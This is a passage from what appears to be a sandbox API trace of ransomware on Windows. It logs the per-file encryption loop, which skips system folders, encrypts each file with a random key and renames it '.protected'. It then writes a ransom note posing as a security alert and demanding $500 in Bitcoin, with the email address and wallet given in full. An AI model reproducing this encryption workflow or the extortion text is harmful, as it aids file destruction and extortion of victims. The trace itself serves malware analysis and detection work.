returned 0xb4 [0059.488] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 79 [0059.488] StrStrW (lpFirst="osetupui.dll", lpSrch=".txt") returned 0x0 [0059.488] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 79 [0059.488] StrStrW (lpFirst="osetupui.dll", lpSrch=".rar") returned 0x0 [0059.488] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 79 [0059.488] StrStrW (lpFirst="osetupui.dll", lpSrch=".zip") returned 0x0 [0059.488] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0059.489] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0059.489] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0059.490] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.490] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0059.497] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0059.497] CloseHandle (hObject=0xb4) returned 1 [0059.497] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll.protected") returned 89 [0059.497] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\osetupui.dll"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll.protected" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\osetupui.dll.protected")) returned 1 [0059.498] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0059.498] lstrcmpiW (lpString1="pss10r.chm", lpString2="Windows") returned -1 [0059.498] lstrcmpiW (lpString1="pss10r.chm", lpString2="Program Files") returned 1 [0059.498] lstrcmpiW (lpString1="pss10r.chm", lpString2="Program Files (x86)") returned 1 [0059.498] lstrcmpiW (lpString1="pss10r.chm", lpString2="$Recycle.bin") returned 1 [0059.498] lstrcmpiW (lpString1="pss10r.chm", lpString2="System Volume Information") returned -1 [0059.498] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 77 [0059.498] StrStrIW (lpFirst="pss10r.chm", lpSrch=".protected") returned 0x0 [0059.498] lstrcmpW (lpString1="pss10r.chm", lpString2="RESTORE_FILES.txt") returned -1 [0059.498] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0059.498] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0059.498] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0059.498] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 77 [0059.498] StrStrW (lpFirst="pss10r.chm", lpSrch=".txt") returned 0x0 [0059.499] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 77 [0059.499] StrStrW (lpFirst="pss10r.chm", lpSrch=".rar") returned 0x0 [0059.499] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 77 [0059.499] StrStrW (lpFirst="pss10r.chm", lpSrch=".zip") returned 0x0 [0059.499] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0059.528] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0059.528] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0059.528] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.528] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0059.622] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0059.623] CloseHandle (hObject=0xb4) returned 1 [0059.623] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm.protected") returned 87 [0059.623] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm.protected" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm.protected")) returned 1 [0059.624] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0059.624] lstrcmpiW (lpString1="setup.chm", lpString2="Windows") returned -1 [0059.624] lstrcmpiW (lpString1="setup.chm", lpString2="Program Files") returned 1 [0059.624] lstrcmpiW (lpString1="setup.chm", lpString2="Program Files (x86)") returned 1 [0059.624] lstrcmpiW (lpString1="setup.chm", lpString2="$Recycle.bin") returned 1 [0059.624] lstrcmpiW (lpString1="setup.chm", lpString2="System Volume Information") returned -1 [0059.624] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 76 [0059.624] StrStrIW (lpFirst="setup.chm", lpSrch=".protected") returned 0x0 [0059.624] lstrcmpW (lpString1="setup.chm", lpString2="RESTORE_FILES.txt") returned 1 [0059.624] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0059.624] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0059.624] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0059.624] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 76 [0059.624] StrStrW (lpFirst="setup.chm", lpSrch=".txt") returned 0x0 [0059.624] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 76 [0059.624] StrStrW (lpFirst="setup.chm", lpSrch=".rar") returned 0x0 [0059.624] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 76 [0059.624] StrStrW (lpFirst="setup.chm", lpSrch=".zip") returned 0x0 [0059.624] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0059.681] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0059.681] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0059.681] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.681] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0059.683] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0059.684] CloseHandle (hObject=0xb4) returned 1 [0059.684] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm.protected") returned 86 [0059.684] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm.protected" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm.protected")) returned 1 [0059.684] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0059.684] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0059.684] lstrcmpiW (lpString1="Setup.xml", lpString2="Program Files") returned 1 [0059.684] lstrcmpiW (lpString1="Setup.xml", lpString2="Program Files (x86)") returned 1 [0059.684] lstrcmpiW (lpString1="Setup.xml", lpString2="$Recycle.bin") returned 1 [0059.685] lstrcmpiW (lpString1="Setup.xml", lpString2="System Volume Information") returned -1 [0059.685] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0059.685] StrStrIW (lpFirst="Setup.xml", lpSrch=".protected") returned 0x0 [0059.685] lstrcmpW (lpString1="Setup.xml", lpString2="RESTORE_FILES.txt") returned 1 [0059.685] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0059.685] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0059.685] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0059.685] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0059.685] StrStrW (lpFirst="Setup.xml", lpSrch=".txt") returned 0x0 [0059.685] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0059.685] StrStrW (lpFirst="Setup.xml", lpSrch=".rar") returned 0x0 [0059.685] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0059.685] StrStrW (lpFirst="Setup.xml", lpSrch=".zip") returned 0x0 [0059.685] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x2488, lpOverlapped=0x0) returned 1 [0059.692] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffdb78, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0059.692] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x2488, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x2488, lpOverlapped=0x0) returned 1 [0059.692] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.692] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0059.692] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0059.693] CloseHandle (hObject=0xb4) returned 1 [0059.693] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml.protected") returned 86 [0059.693] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml.protected" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml.protected")) returned 1 [0059.694] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0059.694] lstrcmpiW (lpString1="ShellUI.MST", lpString2="Windows") returned -1 [0059.694] lstrcmpiW (lpString1="ShellUI.MST", lpString2="Program Files") returned 1 [0059.694] lstrcmpiW (lpString1="ShellUI.MST", lpString2="Program Files (x86)") returned 1 [0059.694] lstrcmpiW (lpString1="ShellUI.MST", lpString2="$Recycle.bin") returned 1 [0059.694] lstrcmpiW (lpString1="ShellUI.MST", lpString2="System Volume Information") returned -1 [0059.694] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 78 [0059.694] StrStrIW (lpFirst="ShellUI.MST", lpSrch=".protected") returned 0x0 [0059.694] lstrcmpW (lpString1="ShellUI.MST", lpString2="RESTORE_FILES.txt") returned 1 [0059.694] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0059.694] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0059.694] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0059.695] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 78 [0059.695] StrStrW (lpFirst="ShellUI.MST", lpSrch=".txt") returned 0x0 [0059.695] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 78 [0059.695] StrStrW (lpFirst="ShellUI.MST", lpSrch=".rar") returned 0x0 [0059.695] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 78 [0059.695] StrStrW (lpFirst="ShellUI.MST", lpSrch=".zip") returned 0x0 [0059.695] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0xe00, lpOverlapped=0x0) returned 1 [0059.882] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffff200, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0059.882] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0xe00, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0xe00, lpOverlapped=0x0) returned 1 [0059.883] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.883] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0059.883] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0059.883] CloseHandle (hObject=0xb4) returned 1 [0059.883] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST.protected") returned 88 [0059.883] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST.protected" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst.protected")) returned 1 [0059.884] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0059.884] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0059.884] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\RESTORE_FILES.txt") returned 84 [0059.884] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\RESTORE_FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0059.904] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0059.904] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0059.905] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0059.905] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0059.905] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0059.905] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0059.905] CloseHandle (hObject=0xa4) returned 1 [0059.905] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0059.905] lstrcmpiW (lpString1="{90140000-0117-0409-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0059.905] lstrcmpiW (lpString1="{90140000-0117-0409-1000-0000000FF1CE}-C", lpString2="Program Files") returned -1 [0059.906] lstrcmpiW (lpString1="{90140000-0117-0409-1000-0000000FF1CE}-C", lpString2="Program Files (x86)") returned -1 [0059.906] lstrcmpiW (lpString1="{90140000-0117-0409-1000-0000000FF1CE}-C", lpString2="$Recycle.bin") returned 1 [0059.906] lstrcmpiW (lpString1="{90140000-0117-0409-1000-0000000FF1CE}-C", lpString2="System Volume Information") returned -1 [0059.906] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C") returned 66 [0059.906] lstrcmpW (lpString1="{90140000-0117-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0059.906] lstrcmpW (lpString1="{90140000-0117-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0059.906] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\*") returned 68 [0059.906] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x447cc0 [0060.020] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0060.021] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0060.021] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0060.021] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0060.021] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0060.021] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\.") returned 68 [0060.021] lstrcmpW (lpString1=".", 